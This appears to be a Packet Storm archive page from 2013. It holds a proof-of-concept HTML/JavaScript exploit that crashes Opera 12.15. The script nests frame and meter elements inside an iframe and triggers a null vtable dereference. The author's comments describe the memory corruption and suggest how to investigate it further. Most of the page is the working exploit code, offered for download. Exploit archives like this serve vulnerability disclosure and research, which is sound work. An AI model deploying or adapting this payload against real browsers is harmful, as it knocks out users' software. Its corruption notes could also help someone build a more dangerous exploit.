what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Opera 12.15 Denial Of Service

Opera 12.15 Denial Of Service
Posted Jul 3, 2013

Opera 12.15 memory exhaustion denial of service proof of concept exploit.

tags | exploit, denial of service, proof of concept
SHA-256 | e80bf0b28cac486ed8ed4c65a980b26f413e23a47119c3060562212b52f3126c

Opera 12.15 Denial Of Service

Change Mirror Download
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Opera 12.15 DOS POC</title>
</head>
<body>
<iframe id="wnd"></iframe>
<script type="text/javascript" language="JavaScript">

/*
Test: Windows 7 x64
Version: Opera 12.15 Win32
Link: www.opera.com
*/

var wnd = document.getElementById("wnd");
wnd = wnd.contentWindow;

function d00m()
{
var tag = [];
tag.push(document.createElement("frame"));
tag.push(document.createElement("meter"));

wnd.document.body.appendChild(tag[0]);
wnd.document.body.appendChild(tag[1]);

/* step 1*/
var obj = tag[1];

var obj_1 = tag[0];

try{ obj_1.appendChild(obj); }catch(b){}
/* eax = [esi + 14h] = this->unknow20 */
try{ obj_1.getBoundingClientRect(); }catch(a){} /* ecx = [eax + 14h] = this->unknow20->unknow20 */
/* eax = [ecx] = this->unknow20->unknow20[vtBl] (correnct) */
/* step 2*/
var obj = tag[0];

var obj_1 = tag[1];

try{ obj_1.appendChild(obj); }catch(b){}

try{ obj_1.getBoundingClientRect();}catch(a){} /* eax = [esi + 14h] = this->unknow20 */
/* ecx = [eax + 14h] = this->unknow20->unknow20 */
} /* eax = [ecx] = this->unknow20->unknow20[vtBl] (uncorrect) 0x00000000 reference */

d00m();


/* so we have here some kind of memory corruption */
/* in "step 1" "vulnerable" code works fine he gets refernce to vtable and do some stuff */
/* in "step 2" the same code do the same thing but vtable of refernced object is corrupted and has value 0x0000000*/
/* logically next step should be checking why the vtable in "step 2" is corrupted */
/* i observed heap allocation and free function between "step 1" and "step 2" - no alloc or free of intersting area occurs (but maybe i fuckup something) */
/* We also can set mem access breakpoint on [eax+14h] at the right moment to find out what corrupt vtable */



</script>
<!--088241c155f232f70fcae7020157b9dcff210b84-->
</body>
</html>
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close